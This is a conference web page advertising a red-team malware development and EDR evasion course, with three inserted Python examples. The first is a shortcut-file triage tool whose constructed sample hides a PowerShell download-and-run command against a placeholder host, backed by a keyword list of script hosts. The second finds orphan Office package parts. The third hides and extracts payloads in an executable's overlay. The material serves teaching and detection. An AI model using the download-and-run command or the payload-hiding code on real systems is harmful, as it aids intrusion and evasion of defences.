Submitted URL: https://www.x33fcon.com/#!t/maldev.md
Effective URL: https://www.x33fcon.com/

 * Modern Red Team Malware Development Strategies
 * Overview
 * Course Content
 * Target Audience
 * Prerequisites
 * Trainer's Bio


MODERN RED TEAM MALWARE DEVELOPMENT STRATEGIES

DATES: JULY 18-20

DURATION: 3 DAYS

PRICE: CHECK HERE

AUDIENCE LEVEL: INTERMEDIATE

TAGS: MODERN, RED TEAM, MALWARE, DEVELOPMENT, EVASION

--------------------------------------------------------------------------------


OVERVIEW



This course dives deep into modern Red Team malware development strategies that
were found effective on numerous engagements delivered in tightly monitored
environments. The author will share his insights into the tactics that let his
malware accomplish engagement objectives while running side by side with AVs and
EDRs.





Designing modern Red Team malware carriers smuggled in scripts, executables and
HTML websites is only one of the areas the course focuses on. Students will
learn numerous technical concepts and craft their own malicious Office documents,
shellcode loaders, smuggling payloads and other infected scripts to breach
target systems running AVs and EDRs. By applying modern AV and EDR evasion
techniques to custom-crafted Red Team implants and documents, capable teams
will be equipped with the knowledge to succeed during adversary simulations even
in the most tightly controlled environments.




COURSE CONTENT


DAY 1

 * Classic file infection vectors – VBS/HTA/SCT/WSF/XSL/WSC/VBE/LNK – structure
   examination & practical utilisation
 * Container files – ISO/IMG/VHD/7zip/PDF
 * Successful strategies for HTML Smuggling
 * Hosting Red Team malware in cloud resources for Initial Access purposes
 * Viable tactics for WSH scripts (VBScript/JScript/HTA) that evade specific
   detections
 * Advanced LNK infection techniques
 * LOLBINs, Windows Defender Attack Surface Reduction rules bypasses, trusted
   paths
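The LNK structure examination listed for Day 1, as an added example that is not course material: a small Python parser for the MS-SHLLINK StringData fields (the relative path and command-line arguments a crafted shortcut launches) followed by a few triage heuristics of the kind a SOC analyst would run over shortcuts pulled from a phishing archive. The sample shortcuts, the heuristic lists and the builder are constructed for this example; only the header layout and flag bits come from the public specification.

```python
import struct

# MS-SHLLINK constants (from the public specification)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# StringData entries, when present, always appear in this order after the optional structures
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Triage heuristics (assumed for this example, not from the course): script hosts and
# LOLBINs a shortcut rarely needs, plus argument fragments typical of a downloader one-liner.
SUSPICIOUS_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript",
                    "rundll32", "regsvr32", "certutil", "cmd.exe", "conhost")
SUSPICIOUS_ARGS = ("-enc", "-w hidden", "-windowstyle hidden", "iex", "iwr",
                   "downloadstring", "http://", "https://")


def _read_string(data, pos, unicode):
    """One StringData entry: 2-byte character count, then the characters, no terminator."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    width = 2 if unicode else 1
    raw = data[pos:pos + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le") if unicode else raw.decode("latin-1")
    return text, pos + count * width


def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping LinkTargetIDList and LinkInfo."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            fields[name], pos = _read_string(data, pos, bool(flags & IS_UNICODE))
    return fields


def triage_lnk(data):
    """Return (fields, indicators); indicators lists every heuristic that matched."""
    fields = parse_lnk(data)
    target = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    args = fields.get("arguments", "").lower()
    hits = [h for h in SUSPICIOUS_HOSTS if h in target]
    hits += [a for a in SUSPICIOUS_ARGS if a in args]
    return fields, hits


def build_lnk(relative_path, arguments, icon_location=None):
    """Constructed sample builder (not a real capture): header plus StringData only."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    strings = [relative_path, arguments]
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
        strings.append(icon_location)
    # HeaderSize, CLSID, LinkFlags, FileAttributes (ARCHIVE), three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body


# Constructed samples: a typical downloader shortcut and a benign one.
DROPPER_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -nop -c "iex (iwr http://example.invalid/stage.txt)"',
    r"%SystemRoot%\System32\shell32.dll")
BENIGN_LNK = build_lnk(r"..\Documents\notes.txt", "")

if __name__ == "__main__":
    for label, sample in (("dropper", DROPPER_LNK), ("benign", BENIGN_LNK)):
        fields, hits = triage_lnk(sample)
        print(label, fields.get("relative_path"), fields.get("arguments"), hits)
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo in front of the strings; the parser skips both by their size fields, and an optional ExtraData block after the strings is left untouched. The heuristics are deliberately crude: an operator who spreads the command over the working directory, an environment variable and a benign-looking host will slip past them, which is exactly the tension the Day 1 material is about.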


DAY 2

 * VBA Macros in 2022 - successful strategies
 * Exotic VBA Macro carriers
 * "Lures" – how to entice the user into enabling macros
 * Various means to execute implant in VBA - .NET Reflection, XSL
   Deserialization, XLAM Droppers, and more
 * Evading ASR rules in VBA
 * Hiding payloads in Office file structures
 * Alternative Macro autorun techniques
 * VBA Purging, VBA Stomping, VBAProject.bin manipulation
 * Obfuscation techniques, Office files encryption, anonymization, lowering
   detection rate
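An added example for the "Hiding payloads in Office file structures" bullet above, not taken from the course: an OOXML document is a zip of parts linked by .rels relationship files, so a part that no relationship reaches is a classic place to stash a second stage that Office will carry around but never open. This Python block resolves every internal relationship target in the package and lists the parts nothing points at. The document skeleton, the part names and the hidden payload are constructed for this example.

```python
import io
import posixpath
import re
import zipfile

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REL_ELEMENT = re.compile(rb"<Relationship\b[^>]*>")
ATTR = re.compile(rb'(\w+)="([^"]*)"')


def referenced_parts(zf):
    """Resolve every internal Relationship/@Target in the package to a zip entry name."""
    refs = set()
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        base = name.split("_rels/", 1)[0]          # "word/_rels/document.xml.rels" -> "word/"
        for element in REL_ELEMENT.finditer(zf.read(name)):
            attrs = {k.decode(): v.decode() for k, v in ATTR.findall(element.group(0))}
            if "Target" not in attrs or attrs.get("TargetMode") == "External":
                continue                             # hyperlinks etc. point outside the package
            target = attrs["Target"]
            part = target[1:] if target.startswith("/") else posixpath.normpath(posixpath.join(base, target))
            refs.add(part)
    return refs


def orphan_parts(package):
    """Zip entries that no relationship reaches, ignoring the OPC bookkeeping parts themselves."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        refs = referenced_parts(zf)
        return sorted(n for n in zf.namelist()
                      if not n.endswith("/") and n != "[Content_Types].xml"
                      and not n.endswith(".rels") and n not in refs)


def _rels(*entries):
    """Build a .rels part from (type suffix, target, external?) tuples."""
    items = "".join(
        (f'<Relationship Id="rId{i}" Type="{OFFICE_REL}{typ}" Target="{target}"'
         + (' TargetMode="External"' if external else "") + "/>")
        for i, (typ, target, external) in enumerate(entries, 1))
    return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{PKG_REL_NS}">{items}</Relationships>'


def build_sample_docm(extra_parts=()):
    """Constructed macro-enabled document skeleton (not real Office output)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", _rels(("officeDocument", "word/document.xml", False)))
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", _rels(
            ("vbaProject", "vbaProject.bin", False),
            ("image", "media/image1.png", False),
            ("hyperlink", "http://example.invalid/", True)))
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\0" * 60)  # OLE magic + filler
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n")
        for name, content in extra_parts:                  # e.g. a stage dropped where nothing links to it
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_sample_docm()
    stuffed = build_sample_docm([("word/media/stage2.bin", bytes(range(256)) * 4)])
    print("clean:", orphan_parts(clean))
    print("stuffed:", orphan_parts(stuffed))
```

Treat an orphan as a triage signal rather than a verdict: some producers leave unreferenced parts behind, so follow up with the part's magic bytes and entropy, and cross-check [Content_Types].xml for Override entries that name parts with unexpected extensions. The inverse trick, a relationship that points at a part with a misleading name or content type, needs the same walk but a check on the target rather than on what is unreachable.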


DAY 3

 * Useful PE Executables: EXE, XLL, CPL, others
 * Which language to choose for your loader? – Rust, Go, C++, Python, C#, Nim,
   F#, how about Pascal?
 * Shellcode Loaders - the ultimate weapon
 * Overview on executable protection & obfuscation techniques
 * Hiding payloads in PE sections & overlay
 * Shellcode Fluctuation, Thread Stack Spoofing
 * To Process Inject or Not?
 * Dynamic API Unhooking, Direct Syscalls
 * Execution Guardrails – Sensing sandboxes and untrusted execution environments
 * Other exotic evasion strategies
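An added example for the "Hiding payloads in PE sections & overlay" bullet in the Day 3 list (not the course's code): everything in a PE file past the end of the last section's raw data is the overlay, which the Windows loader never maps, so a loader can carry its payload there and read it back from its own file at run time. This Python block locates the overlay by walking the DOS, COFF, optional and section headers, appends and extracts a tagged payload, and shows the detection-side view (overlay size and entropy). The minimal PE skeleton, the OVL0 marker and the 4-byte length prefix are assumptions of the example.

```python
import math
import struct


def shannon_entropy(buf):
    """Bits per byte; packed or encrypted payloads sit close to 8.0."""
    if not buf:
        return 0.0
    n = len(buf)
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def overlay_offset(pe):
    """Offset where the overlay starts: end of the last section's raw data (or of the headers)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    end = struct.unpack_from("<I", pe, opt + 60)[0]       # SizeOfHeaders (same offset in PE32/PE32+)
    sections = opt + size_opt                             # IMAGE_SECTION_HEADER[num_sections]
    for i in range(num_sections):
        size_raw, ptr_raw = struct.unpack_from("<II", pe, sections + i * 40 + 16)
        end = max(end, ptr_raw + size_raw)
    return min(end, len(pe))                              # tolerate truncated files


def split_overlay(pe):
    off = overlay_offset(pe)
    return pe[:off], pe[off:]


MARKER = b"OVL0"  # hypothetical tag so the loader can find its own payload in the overlay


def append_overlay(pe, payload):
    """Append the payload after the image without touching any header; the file still runs."""
    return pe + MARKER + struct.pack("<I", len(payload)) + payload


def extract_overlay(pe):
    """What a loader would do at run time after reading its own file from disk."""
    _, overlay = split_overlay(pe)
    if not overlay.startswith(MARKER):
        return None
    n = struct.unpack_from("<I", overlay, len(MARKER))[0]
    return overlay[len(MARKER) + 4:len(MARKER) + 4 + n]


def build_minimal_pe():
    """Constructed PE32 skeleton (not a real binary): one .text section holding a single RET."""
    e_lfanew, size_opt, size_of_headers = 0x40, 0xE0, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x0102)  # i386, 1 section, EXE
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 60, size_of_headers)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x10, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)         # CODE | EXECUTE | READ
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + section).ljust(size_of_headers, b"\0")
    text = b"\xC3" + b"\0" * 0x1FF                        # ret, padded to SizeOfRawData
    return headers + text


def overlay_report(pe):
    """Detection-side view: overlay size and entropy relative to the mapped image."""
    image, overlay = split_overlay(pe)
    return {"image_size": len(image), "overlay_size": len(overlay),
            "overlay_entropy": round(shannon_entropy(overlay), 2)}


if __name__ == "__main__":
    stuffed = append_overlay(build_minimal_pe(), bytes(range(256)))
    print(overlay_report(stuffed), extract_overlay(stuffed)[:8])
```

Authenticode signatures also live past the sections (the security directory points at them), so a real loader should respect that directory, and a detection rule should not flag every overlay: signed installers and self-extracting archives carry legitimate ones. A large, high-entropy overlay on an unsigned binary with a tiny code section is the combination worth alerting on.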


TARGET AUDIENCE



This training is designed to supply practical knowledge to a variety of IT
specialists, including:



 * Penetration Testers
 * Red Team operators
 * SOC analysts
 * Security Professionals
 * IT Support, administrative and network personnel


PREREQUISITES


PREREQUISITE KNOWLEDGE

 * A firm familiarity of Windows and Linux command line syntax
 * Understanding of networking concepts
 * Previous pentesting and/or SOC experience is advantageous, but not required


HARDWARE / SOFTWARE REQUIREMENTS

 * Students will need to bring a laptop to which they have administrative/root
   access, running either Windows, Linux or Mac operating systems
 * Students will need to have access to VNC, SSH and OpenVPN clients on their
   laptops (these can be installed at the start of the training)














TRAINER'S BIO


MARIUSZ BANACH

> Mariusz is an active security researcher, pentester and red team operator
> currently involved in advanced adversary simulations for an international
> bank. With 8+ years of experience gained as a malware analyst and AV engine
> developer, as a penetration tester who performed tens of assessments of exotic
> networks and systems, and finally as a red team operator, he now teaches,
> helps analyze and devises new threat Tactics, Techniques and Procedures (TTPs).
>
> He is best known for his research on malware development and frequent
> releases of offensive tools that help red teams bolster their game against
> cybercriminals. Most of his work is published at github.com/mgeeky.
>
> He passionately provides his partners with unique advisory, learning and
> detection opportunities by sharing security expertise ranging from applications,
> through corporate infrastructures, domain environments and clouds, to Windows
> low-level internals. Over the years, he has acquired a number of certifications.

--------------------------------------------------------------------------------

Copyright © 2022 x33fcon. All rights reserved.
Website generated with MDwiki © Timo Dörr and contributors.